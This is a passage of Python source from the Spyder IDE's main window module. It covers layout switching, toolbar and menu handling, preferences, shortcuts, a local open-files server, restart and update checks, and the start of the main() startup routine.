if dlg.exec_():
set_(section, 'names', dlg.names)
set_(section, 'order', dlg.order)
set_(section, 'active', dlg.active)
self.quick_layout_set_menu()
def quick_layout_switch(self, index):
"""Switch to quick layout number *index*"""
section = 'quick_layouts'
try:
settings = self.load_window_settings('layout_{}/'.format(index),
section=section)
(hexstate, window_size, prefs_dialog_size, pos, is_maximized,
is_fullscreen) = settings
# The defaults layouts will alwyas be regenerated unless there was
# an overwrite, either by rewriting with same name, or by deleting
# and then creating a new one
if hexstate is None:
self.setup_default_layouts(index, settings)
except cp.NoOptionError:
QMessageBox.critical(self, _("Warning"),
_("Quick switch layout #%s has not yet "
"been defined.") % str(index))
return
# TODO: is there any real use in calling the previous layout
# setting?
# self.previous_layout_settings = self.get_window_settings()
self.set_window_settings(*settings)
self.current_quick_layout = index
# make sure the flags are correctly set for visible panes
for plugin in self.widgetlist:
action = plugin.toggle_view_action
action.setChecked(plugin.dockwidget.isVisible())
# --- Show/Hide toolbars
def _update_show_toolbars_action(self):
"""Update the text displayed in the menu entry."""
if self.toolbars_visible:
text = _("Hide toolbars")
tip = _("Hide toolbars")
else:
text = _("Show toolbars")
tip = _("Show toolbars")
self.show_toolbars_action.setText(text)
self.show_toolbars_action.setToolTip(tip)
def save_visible_toolbars(self):
"""Saves the name of the visible toolbars in the .ini file."""
toolbars = []
for toolbar in self.visible_toolbars:
toolbars.append(toolbar.objectName())
CONF.set('main', 'last_visible_toolbars', toolbars)
def get_visible_toolbars(self):
"""Collects the visible toolbars."""
toolbars = []
for toolbar in self.toolbarslist:
if toolbar.toggleViewAction().isChecked():
toolbars.append(toolbar)
self.visible_toolbars = toolbars
def load_last_visible_toolbars(self):
"""Loads the last visible toolbars from the .ini file."""
toolbars_names = CONF.get('main', 'last_visible_toolbars', default=[])
if toolbars_names:
dic = {}
for toolbar in self.toolbarslist:
dic[toolbar.objectName()] = toolbar
toolbars = []
for name in toolbars_names:
if name in dic:
toolbars.append(dic[name])
self.visible_toolbars = toolbars
else:
self.get_visible_toolbars()
self._update_show_toolbars_action()
@Slot()
def show_toolbars(self):
"""Show/Hides toolbars."""
value = not self.toolbars_visible
CONF.set('main', 'toolbars_visible', value)
if value:
self.save_visible_toolbars()
else:
self.get_visible_toolbars()
for toolbar in self.visible_toolbars:
toolbar.toggleViewAction().setChecked(value)
toolbar.setVisible(value)
self.toolbars_visible = value
self._update_show_toolbars_action()
# --- Other
def plugin_focus_changed(self):
"""Focus has changed from one plugin to another"""
self.update_edit_menu()
self.update_search_menu()
# Now deal with Python shell and IPython plugins
if self.ipyconsole is not None:
focus_client = self.ipyconsole.get_focus_client()
if focus_client is not None:
self.last_console_plugin_focus_was_python = False
else:
shell = get_focus_python_shell()
if shell is not None:
self.last_console_plugin_focus_was_python = True
def show_shortcuts(self, menu):
"""Show action shortcuts in menu"""
for element in getattr(self, menu + '_menu_actions'):
if element and isinstance(element, QAction):
if element._shown_shortcut is not None:
element.setShortcut(element._shown_shortcut)
def hide_shortcuts(self, menu):
"""Hide action shortcuts in menu"""
for element in getattr(self, menu + '_menu_actions'):
if element and isinstance(element, QAction):
if element._shown_shortcut is not None:
element.setShortcut(QKeySequence())
def get_focus_widget_properties(self):
"""Get properties of focus widget
Returns tuple (widget, properties) where properties is a tuple of
booleans: (is_console, not_readonly, readwrite_editor)"""
widget = QApplication.focusWidget()
from spyder.widgets.shell import ShellBaseWidget
from spyder.widgets.editor import TextEditBaseWidget
from spyder.widgets.ipythonconsole import ControlWidget
# if focused widget isn't valid try the last focused
if not isinstance(widget, (ShellBaseWidget, TextEditBaseWidget,
ControlWidget)):
widget = self.previous_focused_widget
textedit_properties = None
if isinstance(widget, (ShellBaseWidget, TextEditBaseWidget,
ControlWidget)):
console = isinstance(widget, (ShellBaseWidget, ControlWidget))
not_readonly = not widget.isReadOnly()
readwrite_editor = not_readonly and not console
textedit_properties = (console, not_readonly, readwrite_editor)
return widget, textedit_properties
def update_edit_menu(self):
"""Update edit menu"""
widget, textedit_properties = self.get_focus_widget_properties()
if textedit_properties is None: # widget is not an editor/console
return
#!!! Below this line, widget is expected to be a QPlainTextEdit instance
console, not_readonly, readwrite_editor = textedit_properties
# Editor has focus and there is no file opened in it
if not console and not_readonly and not self.editor.is_file_opened():
return
# Disabling all actions to begin with
for child in self.edit_menu.actions():
child.setEnabled(False)
self.selectall_action.setEnabled(True)
# Undo, redo
self.undo_action.setEnabled( readwrite_editor \
and widget.document().isUndoAvailable() )
self.redo_action.setEnabled( readwrite_editor \
and widget.document().isRedoAvailable() )
# Copy, cut, paste, delete
has_selection = widget.has_selected_text()
self.copy_action.setEnabled(has_selection)
self.cut_action.setEnabled(has_selection and not_readonly)
self.paste_action.setEnabled(not_readonly)
# Comment, uncomment, indent, unindent...
if not console and not_readonly:
# This is the editor and current file is writable
for action in self.editor.edit_menu_actions:
action.setEnabled(True)
def update_search_menu(self):
"""Update search menu"""
if self.menuBar().hasFocus():
return
widget, textedit_properties = self.get_focus_widget_properties()
for action in self.editor.search_menu_actions:
try:
action.setEnabled(self.editor.isAncestorOf(widget))
except RuntimeError:
pass
if textedit_properties is None: # widget is not an editor/console
return
#!!! Below this line, widget is expected to be a QPlainTextEdit instance
_x, _y, readwrite_editor = textedit_properties
# Disable the replace action for read-only files
self.search_menu_actions[3].setEnabled(readwrite_editor)
def create_plugins_menu(self):
order = ['editor', 'console', 'ipython_console', 'variable_explorer',
'help', None, 'explorer', 'outline_explorer',
'project_explorer', 'find_in_files', None, 'historylog',
'profiler', 'breakpoints', 'pylint', None,
'onlinehelp', 'internal_console']
for plugin in self.widgetlist:
action = plugin.toggle_view_action
action.setChecked(plugin.dockwidget.isVisible())
try:
name = plugin.CONF_SECTION
pos = order.index(name)
except ValueError:
pos = None
if pos is not None:
order[pos] = action
else:
order.append(action)
actions = order[:]
for action in order:
if type(action) is str:
actions.remove(action)
self.plugins_menu_actions = actions
add_actions(self.plugins_menu, actions)
def create_toolbars_menu(self):
order = ['file_toolbar', 'run_toolbar', 'debug_toolbar',
'main_toolbar', 'Global working directory', None,
'search_toolbar', 'edit_toolbar', 'source_toolbar']
for toolbar in self.toolbarslist:
action = toolbar.toggleViewAction()
name = toolbar.objectName()
try:
pos = order.index(name)
except ValueError:
pos = None
if pos is not None:
order[pos] = action
else:
order.append(action)
add_actions(self.toolbars_menu, order)
def createPopupMenu(self):
menu = QMenu('', self)
actions = self.help_menu_actions[:3] + \
[None, self.help_menu_actions[-1]]
add_actions(menu, actions)
return menu
def set_splash(self, message):
"""Set splash message"""
if self.splash is None:
return
if message:
self.debug_print(message)
self.splash.show()
self.splash.showMessage(message, Qt.AlignBottom | Qt.AlignCenter |
Qt.AlignAbsolute, QColor(Qt.black))
QApplication.processEvents()
def remove_tmpdir(self):
"""Remove Spyder temporary directory"""
shutil.rmtree(programs.TEMPDIR, ignore_errors=True)
def closeEvent(self, event):
"""closeEvent reimplementation"""
if self.closing(True):
event.accept()
else:
event.ignore()
def resizeEvent(self, event):
"""Reimplement Qt method"""
if not self.isMaximized() and not self.fullscreen_flag:
self.window_size = self.size()
QMainWindow.resizeEvent(self, event)
# To be used by the tour to be able to resize
self.sig_resized.emit(event)
def moveEvent(self, event):
"""Reimplement Qt method"""
if not self.isMaximized() and not self.fullscreen_flag:
self.window_position = self.pos()
QMainWindow.moveEvent(self, event)
# To be used by the tour to be able to move
self.sig_moved.emit(event)
def hideEvent(self, event):
"""Reimplement Qt method"""
for plugin in self.widgetlist:
if plugin.isAncestorOf(self.last_focused_widget):
plugin.visibility_changed(True)
QMainWindow.hideEvent(self, event)
def change_last_focused_widget(self, old, now):
"""To keep track of to the last focused widget"""
if (now is None and QApplication.activeWindow() is not None):
QApplication.activeWindow().setFocus()
self.last_focused_widget = QApplication.focusWidget()
elif now is not None:
self.last_focused_widget = now
self.previous_focused_widget = old
def closing(self, cancelable=False):
"""Exit tasks"""
if self.already_closed or self.is_starting_up:
return True
if cancelable and CONF.get('main', 'prompt_on_exit'):
reply = QMessageBox.critical(self, 'Spyder',
'Do you really want to exit?',
QMessageBox.Yes, QMessageBox.No)
if reply == QMessageBox.No:
return False
prefix = 'window' + '/'
self.save_current_window_settings(prefix)
if CONF.get('main', 'single_instance'):
self.open_files_server.close()
for plugin in self.thirdparty_plugins:
if not plugin.closing_plugin(cancelable):
return False
for widget in self.widgetlist:
if not widget.closing_plugin(cancelable):
return False
self.dialog_manager.close_all()
if self.toolbars_visible:
self.save_visible_toolbars()
self.already_closed = True
return True
def add_dockwidget(self, child):
"""Add QDockWidget and toggleViewAction"""
dockwidget, location = child.create_dockwidget()
if CONF.get('main', 'vertical_dockwidget_titlebars'):
dockwidget.setFeatures(dockwidget.features()|
QDockWidget.DockWidgetVerticalTitleBar)
self.addDockWidget(location, dockwidget)
self.widgetlist.append(child)
@Slot()
def close_current_dockwidget(self):
widget = QApplication.focusWidget()
for plugin in self.widgetlist:
if plugin.isAncestorOf(widget):
plugin.dockwidget.hide()
break
def toggle_lock_dockwidgets(self, value):
"""Lock/Unlock dockwidgets"""
self.dockwidgets_locked = value
self.apply_panes_settings()
CONF.set('main', 'panes_locked', value)
def __update_maximize_action(self):
if self.state_before_maximizing is None:
text = _("Maximize current pane")
tip = _("Maximize current pane")
icon = ima.icon('maximize')
else:
text = _("Restore current pane")
tip = _("Restore pane to its original size")
icon = ima.icon('unmaximize')
self.maximize_action.setText(text)
self.maximize_action.setIcon(icon)
self.maximize_action.setToolTip(tip)
@Slot()
@Slot(bool)
def maximize_dockwidget(self, restore=False):
"""Shortcut: Ctrl+Alt+Shift+M
First call: maximize current dockwidget
Second call (or restore=True): restore original window layout"""
if self.state_before_maximizing is None:
if restore:
return
# No plugin is currently maximized: maximizing focus plugin
self.state_before_maximizing = self.saveState()
focus_widget = QApplication.focusWidget()
for plugin in self.widgetlist:
plugin.dockwidget.hide()
if plugin.isAncestorOf(focus_widget):
self.last_plugin = plugin
self.last_plugin.dockwidget.toggleViewAction().setDisabled(True)
self.setCentralWidget(self.last_plugin)
self.last_plugin.ismaximized = True
# Workaround to solve an issue with editor's outline explorer:
# (otherwise the whole plugin is hidden and so is the outline explorer
# and the latter won't be refreshed if not visible)
self.last_plugin.show()
self.last_plugin.visibility_changed(True)
if self.last_plugin is self.editor:
# Automatically show the outline if the editor was maximized:
self.addDockWidget(Qt.RightDockWidgetArea,
self.outlineexplorer.dockwidget)
self.outlineexplorer.dockwidget.show()
else:
# Restore original layout (before maximizing current dockwidget)
self.last_plugin.dockwidget.setWidget(self.last_plugin)
self.last_plugin.dockwidget.toggleViewAction().setEnabled(True)
self.setCentralWidget(None)
self.last_plugin.ismaximized = False
self.restoreState(self.state_before_maximizing)
self.state_before_maximizing = None
self.last_plugin.get_focus_widget().setFocus()
self.__update_maximize_action()
def __update_fullscreen_action(self):
if self.isFullScreen():
icon = ima.icon('window_nofullscreen')
else:
icon = ima.icon('window_fullscreen')
if is_text_string(icon):
icon = get_icon(icon)
self.fullscreen_action.setIcon(icon)
@Slot()
def toggle_fullscreen(self):
if self.isFullScreen():
self.fullscreen_flag = False
self.showNormal()
if self.maximized_flag:
self.showMaximized()
else:
self.maximized_flag = self.isMaximized()
self.fullscreen_flag = True
self.showFullScreen()
self.__update_fullscreen_action()
def add_to_toolbar(self, toolbar, widget):
"""Add widget actions to toolbar"""
actions = widget.toolbar_actions
if actions is not None:
add_actions(toolbar, actions)
@Slot()
def about(self):
"""About Spyder"""
versions = get_versions()
# Show Mercurial revision for development version
revlink = ''
if versions['revision']:
rev = versions['revision']
revlink = " (<a href='https://github.com/spyder-ide/spyder/"\
"commit/%s'>Commit: %s</a>)" % (rev, rev)
QMessageBox.about(self,
_("About %s") % "Spyder",
"""<b>Spyder %s</b> %s
<br>The Scientific PYthon Development EnviRonment
<br>Copyright © The Spyder Project Contributors
<br>Licensed under the terms of the MIT License
<p>Created by Pierre Raybaut.
<br>Developed and maintained by the
<a href="%s/blob/master/AUTHORS">Spyder Project Contributors</a>.
<br>Many thanks to all the Spyder beta testers and regular users.
<p>For bug reports and feature requests, please go
to our <a href="%s">Github website</a>. For discussions around the
project, please go to our <a href="%s">Google Group</a>
<p>This project is part of a larger effort to promote and
facilitate the use of Python for scientific and engineering
software development. The popular Python distributions
<a href="http://continuum.io/downloads">Anaconda</a>,
<a href="https://winpython.github.io/">WinPython</a> and
<a href="http://python-xy.github.io/">Python(x,y)</a>
also contribute to this plan.
<p>Python %s %dbits, Qt %s, %s %s on %s
<p><small>Most of the icons for the Spyder 2 theme come from the Crystal
Project (© 2006-2007 Everaldo Coelho). Other icons for that
theme come from <a href="http://p.yusukekamiyamane.com/"> Yusuke
Kamiyamane</a> (all rights reserved) and from
<a href="http://www.oxygen-icons.org/">
The Oxygen icon theme</a></small>.
"""
% (versions['spyder'], revlink, __project_url__,
__project_url__, __forum_url__, versions['python'],
versions['bitness'], versions['qt'], versions['qt_api'],
versions['qt_api_ver'], versions['system']))
@Slot()
def show_dependencies(self):
"""Show Spyder's Dependencies dialog box"""
from spyder.widgets.dependencies import DependenciesDialog
dlg = DependenciesDialog(None)
dlg.set_data(dependencies.DEPENDENCIES)
dlg.show()
dlg.exec_()
@Slot()
def report_issue(self):
if PY3:
from urllib.parse import quote
else:
from urllib import quote # analysis:ignore
versions = get_versions()
# Get git revision for development version
revision = ''
if versions['revision']:
revision = versions['revision']
issue_template = """\
## Description
**What steps will reproduce the problem?**
1.
2.
3.
**What is the expected output? What do you see instead?**
**Please provide any additional information below**
## Version and main components
* Spyder Version: %s %s
* Python Version: %s
* Qt Versions: %s, %s %s on %s
## Dependencies
```
%s
```
""" % (versions['spyder'],
revision,
versions['python'],
versions['qt'],
versions['qt_api'],
versions['qt_api_ver'],
versions['system'],
dependencies.status())
url = QUrl("https://github.com/spyder-ide/spyder/issues/new")
if PYQT5:
from qtpy.QtCore import QUrlQuery
query = QUrlQuery()
query.addQueryItem("body", quote(issue_template))
url.setQuery(query)
else:
url.addEncodedQueryItem("body", quote(issue_template))
QDesktopServices.openUrl(url)
@Slot()
def google_group(self):
url = QUrl("http://groups.google.com/group/spyderlib")
QDesktopServices.openUrl(url)
@Slot()
def global_callback(self):
"""Global callback"""
widget = QApplication.focusWidget()
action = self.sender()
callback = from_qvariant(action.data(), to_text_string)
from spyder.widgets.editor import TextEditBaseWidget
# if focused widget isn't valid try the last focused^M
if not isinstance(widget, TextEditBaseWidget):
widget = self.previous_focused_widget
if isinstance(widget, TextEditBaseWidget):
getattr(widget, callback)()
def redirect_internalshell_stdio(self, state):
if state:
self.console.shell.interpreter.redirect_stds()
else:
self.console.shell.interpreter.restore_stds()
def open_external_console(self, fname, wdir, args, interact, debug, python,
python_args, systerm, post_mortem=False):
"""Open external console"""
if systerm:
# Running script in an external system terminal
try:
programs.run_python_script_in_terminal(fname, wdir, args,
interact, debug, python_args)
except NotImplementedError:
QMessageBox.critical(self, _("Run"),
_("Running an external system terminal "
"is not supported on platform %s."
) % os.name)
else:
self.extconsole.visibility_changed(True)
self.extconsole.raise_()
self.extconsole.start(
fname=to_text_string(fname), wdir=to_text_string(wdir),
args=to_text_string(args), interact=interact,
debug=debug, python=python, post_mortem=post_mortem,
python_args=to_text_string(python_args) )
def execute_in_external_console(self, lines, focus_to_editor):
"""
Execute lines in external or IPython console and eventually set focus
to the editor
"""
console = self.extconsole
if self.ipyconsole is None or self.last_console_plugin_focus_was_python:
console = self.extconsole
else:
console = self.ipyconsole
console.visibility_changed(True)
console.raise_()
console.execute_code(lines)
if focus_to_editor:
self.editor.visibility_changed(True)
def open_file(self, fname, external=False):
"""
Open filename with the appropriate application
Redirect to the right widget (txt -> editor, spydata -> workspace, ...)
or open file outside Spyder (if extension is not supported)
"""
fname = to_text_string(fname)
ext = osp.splitext(fname)[1]
if encoding.is_text_file(fname):
self.editor.load(fname)
elif self.variableexplorer is not None and ext in IMPORT_EXT:
self.variableexplorer.import_data(fname)
elif not external:
fname = file_uri(fname)
programs.start_file(fname)
def open_external_file(self, fname):
"""
Open external files that can be handled either by the Editor or the
variable explorer inside Spyder.
"""
fname = encoding.to_unicode_from_fs(fname)
if osp.isfile(fname):
self.open_file(fname, external=True)
elif osp.isfile(osp.join(CWD, fname)):
self.open_file(osp.join(CWD, fname), external=True)
#---- PYTHONPATH management, etc.
def get_spyder_pythonpath(self):
"""Return Spyder PYTHONPATH"""
return self.path+self.project_path
def add_path_to_sys_path(self):
"""Add Spyder path to sys.path"""
for path in reversed(self.get_spyder_pythonpath()):
sys.path.insert(1, path)
def remove_path_from_sys_path(self):
"""Remove Spyder path from sys.path"""
sys_path = sys.path
while sys_path[1] in self.get_spyder_pythonpath():
sys_path.pop(1)
@Slot()
def path_manager_callback(self):
"""Spyder path manager"""
from spyder.widgets.pathmanager import PathManager
self.remove_path_from_sys_path()
project_path = self.projects.get_pythonpath()
dialog = PathManager(self, self.path, project_path, sync=True)
dialog.redirect_stdio.connect(self.redirect_internalshell_stdio)
dialog.exec_()
self.add_path_to_sys_path()
encoding.writelines(self.path, self.SPYDER_PATH) # Saving path
self.sig_pythonpath_changed.emit()
def pythonpath_changed(self):
"""Projects PYTHONPATH contribution has changed"""
self.remove_path_from_sys_path()
self.project_path = self.projects.get_pythonpath()
self.add_path_to_sys_path()
self.sig_pythonpath_changed.emit()
@Slot()
def win_env(self):
"""Show Windows current user environment variables"""
self.dialog_manager.show(WinUserEnvDialog(self))
#---- Preferences
def apply_settings(self):
"""Apply settings changed in 'Preferences' dialog box"""
qapp = QApplication.instance()
# Set 'gtk+' as the default theme in Gtk-based desktops
# Fixes Issue 2036
if is_gtk_desktop() and ('GTK+' in QStyleFactory.keys()):
try:
qapp.setStyle('gtk+')
except:
pass
else:
qapp.setStyle(CONF.get('main', 'windows_style',
self.default_style))
default = self.DOCKOPTIONS
if CONF.get('main', 'vertical_tabs'):
default = default|QMainWindow.VerticalTabs
if CONF.get('main', 'animated_docks'):
default = default|QMainWindow.AnimatedDocks
self.setDockOptions(default)
self.apply_panes_settings()
self.apply_statusbar_settings()
def apply_panes_settings(self):
"""Update dockwidgets features settings"""
# Update toggle action on menu
for child in self.widgetlist:
features = child.FEATURES
if CONF.get('main', 'vertical_dockwidget_titlebars'):
features = features | QDockWidget.DockWidgetVerticalTitleBar
if not self.dockwidgets_locked:
features = features | QDockWidget.DockWidgetMovable
child.dockwidget.setFeatures(features)
child.update_margins()
def apply_statusbar_settings(self):
"""Update status bar widgets settings"""
show_status_bar = CONF.get('main', 'show_status_bar')
self.statusBar().setVisible(show_status_bar)
if show_status_bar:
for widget, name in ((self.mem_status, 'memory_usage'),
(self.cpu_status, 'cpu_usage')):
if widget is not None:
widget.setVisible(CONF.get('main', '%s/enable' % name))
widget.set_interval(CONF.get('main', '%s/timeout' % name))
else:
return
@Slot()
def edit_preferences(self):
"""Edit Spyder preferences"""
from spyder.plugins.configdialog import ConfigDialog
dlg = ConfigDialog(self)
dlg.size_change.connect(self.set_prefs_size)
if self.prefs_dialog_size is not None:
dlg.resize(self.prefs_dialog_size)
for PrefPageClass in self.general_prefs:
widget = PrefPageClass(dlg, main=self)
widget.initialize()
dlg.add_page(widget)
for plugin in [self.workingdirectory, self.editor,
self.projects, self.extconsole, self.ipyconsole,
self.historylog, self.help, self.variableexplorer,
self.onlinehelp, self.explorer, self.findinfiles
]+self.thirdparty_plugins:
if plugin is not None:
try:
widget = plugin.create_configwidget(dlg)
if widget is not None:
dlg.add_page(widget)
except Exception:
traceback.print_exc(file=sys.stderr)
if self.prefs_index is not None:
dlg.set_current_index(self.prefs_index)
dlg.show()
dlg.check_all_settings()
dlg.pages_widget.currentChanged.connect(self.__preference_page_changed)
dlg.exec_()
def __preference_page_changed(self, index):
"""Preference page index has changed"""
self.prefs_index = index
def set_prefs_size(self, size):
"""Save preferences dialog size"""
self.prefs_dialog_size = size
#---- Shortcuts
def register_shortcut(self, qaction_or_qshortcut, context, name,
add_sc_to_tip=False):
"""
Register QAction or QShortcut to Spyder main application,
with shortcut (context, name, default)
"""
self.shortcut_data.append( (qaction_or_qshortcut, context,
name, add_sc_to_tip) )
def apply_shortcuts(self):
"""Apply shortcuts settings to all widgets/plugins"""
toberemoved = []
for index, (qobject, context, name,
add_sc_to_tip) in enumerate(self.shortcut_data):
keyseq = QKeySequence( get_shortcut(context, name) )
try:
if isinstance(qobject, QAction):
if sys.platform == 'darwin' and \
qobject._shown_shortcut == 'missing':
qobject._shown_shortcut = keyseq
else:
qobject.setShortcut(keyseq)
if add_sc_to_tip:
add_shortcut_to_tooltip(qobject, context, name)
elif isinstance(qobject, QShortcut):
qobject.setKey(keyseq)
except RuntimeError:
# Object has been deleted
toberemoved.append(index)
for index in sorted(toberemoved, reverse=True):
self.shortcut_data.pop(index)
# -- Open files server
def start_open_files_server(self):
self.open_files_server.setsockopt(socket.SOL_SOCKET,
socket.SO_REUSEADDR, 1)
port = select_port(default_port=OPEN_FILES_PORT)
CONF.set('main', 'open_files_port', port)
self.open_files_server.bind(('127.0.0.1', port))
self.open_files_server.listen(20)
while 1: # 1 is faster than True
try:
req, dummy = self.open_files_server.accept()
except socket.error as e:
# See Issue 1275 for details on why errno EINTR is
# silently ignored here.
eintr = errno.WSAEINTR if os.name == 'nt' else errno.EINTR
# To avoid a traceback after closing on Windows
if e.args[0] == eintr:
continue
# handle a connection abort on close error
enotsock = (errno.WSAENOTSOCK if os.name == 'nt'
else errno.ENOTSOCK)
if e.args[0] in [errno.ECONNABORTED, enotsock]:
return
raise
fname = req.recv(1024)
fname = fname.decode('utf-8')
self.sig_open_external_file.emit(fname)
req.sendall(b' ')
# ---- Quit and restart, and reset spyder defaults
@Slot()
def reset_spyder(self):
"""
Quit and reset Spyder and then Restart application.
"""
answer = QMessageBox.warning(self, _("Warning"),
_("Spyder will restart and reset to default settings: <br><br>"
"Do you want to continue?"),
QMessageBox.Yes | QMessageBox.No)
if answer == QMessageBox.Yes:
self.restart(reset=True)
@Slot()
def restart(self, reset=False):
"""
Quit and Restart Spyder application.
If reset True it allows to reset spyder on restart.
"""
# Get start path to use in restart script
spyder_start_directory = get_module_path('spyder')
restart_script = osp.join(spyder_start_directory, 'app', 'restart.py')
# Get any initial argument passed when spyder was started
# Note: Variables defined in bootstrap.py and spyder/app/start.py
env = os.environ.copy()
bootstrap_args = env.pop('SPYDER_BOOTSTRAP_ARGS', None)
spyder_args = env.pop('SPYDER_ARGS')
# Get current process and python running spyder
pid = os.getpid()
python = sys.executable
# Check if started with bootstrap.py
if bootstrap_args is not None:
spyder_args = bootstrap_args
is_bootstrap = True
else:
is_bootstrap = False
# Pass variables as environment variables (str) to restarter subprocess
env['SPYDER_ARGS'] = spyder_args
env['SPYDER_PID'] = str(pid)
env['SPYDER_IS_BOOTSTRAP'] = str(is_bootstrap)
env['SPYDER_RESET'] = str(reset)
if DEV:
if os.name == 'nt':
env['PYTHONPATH'] = ';'.join(sys.path)
else:
env['PYTHONPATH'] = ':'.join(sys.path)
# Build the command and popen arguments depending on the OS
if os.name == 'nt':
# Hide flashing command prompt
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
shell = False
else:
startupinfo = None
shell = True
command = '"{0}" "{1}"'
command = command.format(python, restart_script)
try:
if self.closing(True):
subprocess.Popen(command, shell=shell, env=env,
startupinfo=startupinfo)
self.console.quit()
except Exception as error:
# If there is an error with subprocess, Spyder should not quit and
# the error can be inspected in the internal console
print(error)
print(command)
# ---- Interactive Tours
def show_tour(self, index):
""" """
frames = self.tours_available[index]
self.tour.set_tour(index, frames, self)
self.tour.start_tour()
# ---- Check for Spyder Updates
def _check_updates_ready(self):
"""Called by WorkerUpdates when ready"""
from spyder.widgets.helperwidgets import MessageCheckBox
# feedback` = False is used on startup, so only positive feedback is
# given. `feedback` = True is used when after startup (when using the
# menu action, and gives feeback if updates are, or are not found.
feedback = self.give_updates_feedback
# Get results from worker
update_available = self.worker_updates.update_available
latest_release = self.worker_updates.latest_release
error_msg = self.worker_updates.error
url_r = 'https://github.com/spyder-ide/spyder/releases'
url_i = 'http://pythonhosted.org/spyder/installation.html'
# Define the custom QMessageBox
box = MessageCheckBox()
box.setWindowTitle(_("Spyder updates"))
box.set_checkbox_text(_("Check for updates on startup"))
box.setStandardButtons(QMessageBox.Ok)
box.setDefaultButton(QMessageBox.Ok)
#The next line is commented because it freezes the dialog.
#For now there is then no info icon. This solves issue #3609.
#box.setIcon(QMessageBox.Information)
# Adjust the checkbox depending on the stored configuration
section, option = 'main', 'check_updates_on_startup'
check_updates = CONF.get(section, option)
box.set_checked(check_updates)
if error_msg is not None:
msg = error_msg
box.setText(msg)
box.set_check_visible(False)
box.exec_()
check_updates = box.is_checked()
else:
if update_available:
msg = _("<b>Spyder %s is available!</b> <br><br>Please use "
"your package manager to update Spyder or go to our "
"<a href=\"%s\">Releases</a> page to download this "
"new version. <br><br>If you are not sure how to "
"proceed to update Spyder please refer to our "
" <a href=\"%s\">Installation</a> instructions."
"") % (latest_release, url_r, url_i)
box.setText(msg)
box.set_check_visible(True)
box.exec_()
check_updates = box.is_checked()
elif feedback:
msg = _("Spyder is up to date.")
box.setText(msg)
box.set_check_visible(False)
box.exec_()
check_updates = box.is_checked()
# Update checkbox based on user interaction
CONF.set(section, option, check_updates)
# Enable check_updates_action after the thread has finished
self.check_updates_action.setDisabled(False)
# Provide feeback when clicking menu if check on startup is on
self.give_updates_feedback = True
@Slot()
def check_updates(self):
"""
Check for spyder updates on github releases using a QThread.
"""
from spyder.workers.updates import WorkerUpdates
# Disable check_updates_action while the thread is working
self.check_updates_action.setDisabled(True)
if self.thread_updates is not None:
self.thread_updates.terminate()
self.thread_updates = QThread(self)
self.worker_updates = WorkerUpdates(self)
self.worker_updates.sig_ready.connect(self._check_updates_ready)
self.worker_updates.sig_ready.connect(self.thread_updates.quit)
self.worker_updates.moveToThread(self.thread_updates)
self.thread_updates.started.connect(self.worker_updates.start)
self.thread_updates.start()
#==============================================================================
# Utilities to create the 'main' function
#==============================================================================
def initialize():
"""Initialize Qt, patching sys.exit and eventually setting up ETS"""
# This doesn't create our QApplication, just holds a reference to
# MAIN_APP, created above to show our splash screen as early as
# possible
app = qapplication()
#----Monkey patching QApplication
class FakeQApplication(QApplication):
"""Spyder's fake QApplication"""
def __init__(self, args):
self = app # analysis:ignore
@staticmethod
def exec_():
"""Do nothing because the Qt mainloop is already running"""
pass
from qtpy import QtWidgets
QtWidgets.QApplication = FakeQApplication
# ----Monkey patching sys.exit
def fake_sys_exit(arg=[]):
pass
sys.exit = fake_sys_exit
# ----Monkey patching sys.excepthook to avoid crashes in PyQt 5.5+
if PYQT5:
def spy_excepthook(type_, value, tback):
sys.__excepthook__(type_, value, tback)
sys.excepthook = spy_excepthook
# Removing arguments from sys.argv as in standard Python interpreter
sys.argv = ['']
# Selecting Qt4 backend for Enthought Tool Suite (if installed)
try:
from enthought.etsconfig.api import ETSConfig
ETSConfig.toolkit = 'qt4'
except ImportError:
pass
return app
class Spy(object):
"""
Inspect Spyder internals
Attributes:
app Reference to main QApplication object
window Reference to spyder.MainWindow widget
"""
def __init__(self, app, window):
self.app = app
self.window = window
def __dir__(self):
return list(self.__dict__.keys()) +\
[x for x in dir(self.__class__) if x[0] != '_']
def versions(self):
return get_versions()
def run_spyder(app, options, args):
"""
Create and show Spyder's main window
Start QApplication event loop
"""
#TODO: insert here
# Main window
main = MainWindow(options)
try:
main.setup()
except BaseException:
if main.console is not None:
try:
main.console.shell.exit_interpreter()
except BaseException:
pass
raise
main.show()
main.post_visible_setup()
if main.console:
main.console.shell.interpreter.namespace['spy'] = \
Spy(app=app, window=main)
# Open external files passed as args
if args:
for a in args:
main.open_external_file(a)
# Don't show icons in menus for Mac
if sys.platform == 'darwin':
QCoreApplication.setAttribute(Qt.AA_DontShowIconsInMenus, True)
# Open external files with our Mac app
if running_in_mac_app():
app.sig_open_external_file.connect(main.open_external_file)
# To give focus again to the last focused widget after restoring
# the window
app.focusChanged.connect(main.change_last_focused_widget)
if not PYTEST:
app.exec_()
return main
#==============================================================================
# Main
#==============================================================================
def main():
"""Main function"""
# **** Collect command line options ****
# Note regarding Options:
# It's important to collect options before monkey patching sys.exit,
# otherwise, optparse won't be able to exit if --help option is passed
options, args = get_options()
if set_attached_console_visible is not None:
set_attached_console_visible(DEBUG or options.show_console \
or options.reset_config_files \
or options.reset_to_defaults \
or options.optimize)
app = initialize()
if options.reset_config_files:
# <!> Remove all configuration files!
reset_config_files()
return
elif options.reset_to_defaults:
# Reset Spyder settings to defaults
CONF.reset_to_defaults(save=True)
return
elif options.optimize:
# Optimize the whole Spyder's source code directory
import spyder
programs.run_python_script(module="compileall",
args=[spyder.__path__[0]], p_args=['-O'])
return
# Show crash dialog
if CONF.get('main', 'crash', False) and not DEV:
CONF.set('main', 'crash', False)
if SPLASH is not None:
SPLASH.hide()
QMessageBox.information(None, "Spyder",
"Spyder crashed during last session.<br><br>"
"If Spyder does not start at all and <u>before submitting a "
"bug report</u>, please try to reset settings to defaults by "
"running Spyder with the command line option '--reset':<br>"
"<span style=\'color: #555555\'><b>python spyder --reset"
"</b></span><br><br>"
"<span style=\'color: #ff5555\'><b>Warning:</b></span> "
"this command will remove all your Spyder configuration files "
"located in '%s').<br><br>"
"If restoring the default settings does not help, please take "
"the time to search for <a href=\"%s\">known bugs</a> or "
"<a href=\"%s\">discussions</a> matching your situation before "
"eventually creating a new issue <a href=\"%s\">here</a>. "
"Your feedback will always be greatly appreciated."
"" % (get_conf_path(), __project_url__,
__forum_url__, __project_url__))
# Create main window
mainwindow = None
try:
mainwindow = run_spyder(app, options, args)
except FontError as fontError:
QMessageBox.information(None, "Spyder",
